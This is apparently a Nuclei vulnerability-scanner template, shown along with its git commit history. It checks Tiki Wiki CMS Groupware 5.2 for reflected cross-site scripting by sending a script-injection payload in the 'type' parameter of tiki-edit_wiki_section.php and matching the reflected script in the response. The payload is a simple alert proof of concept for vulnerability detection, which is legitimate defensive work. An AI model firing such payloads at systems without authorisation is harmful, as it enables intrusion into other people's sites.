nuclei-templates/vulnerabilities/other/tikiwiki-reflected-xss.yaml

id: tikiwiki-reflected-xss

info:
  name: Tiki Wiki CMS Groupware 5.2 Reflected Cross-site Scripting
  author: madrobot
  severity: medium
  tags: xss,tikiwiki

requests:
  - method: GET
    path:
      - "{{BaseURL}}/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E"
      - "{{BaseURL}}/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<script>alert(31337)</script>"
        part: body
      - type: word
        words:
          - "text/html"
        part: header
Create tikiwiki-reflected-xss.yam 2020-07-31 17:25:41 +00:00			`id: tikiwiki-reflected-xss`

			`info:`
			`name: Tiki Wiki CMS Groupware 5.2 Reflected Cross-site Scripting`
			`author: madrobot`
			`severity: medium`
Update tikiwiki-reflected-xss.yaml 2021-08-02 16:14:48 +00:00			`tags: xss,tikiwiki`
fix minor yamllint issues Fix minor yamllint issues to move forward. 2020-08-25 20:18:58 +00:00
Create tikiwiki-reflected-xss.yam 2020-07-31 17:25:41 +00:00			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E"`
			`- "{{BaseURL}}/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E"`
matcher updates 2020-07-31 17:42:34 +00:00
Create tikiwiki-reflected-xss.yam 2020-07-31 17:25:41 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
matcher updates 2020-07-31 17:42:34 +00:00			`- "<script>alert(31337)</script>"`
Adding content type checks for XSS templates 2020-12-13 19:24:23 +00:00			`part: body`
			`- type: word`
			`words:`
			`- "text/html"`
Update tikiwiki-reflected-xss.yaml 2021-08-02 16:14:48 +00:00			`part: header`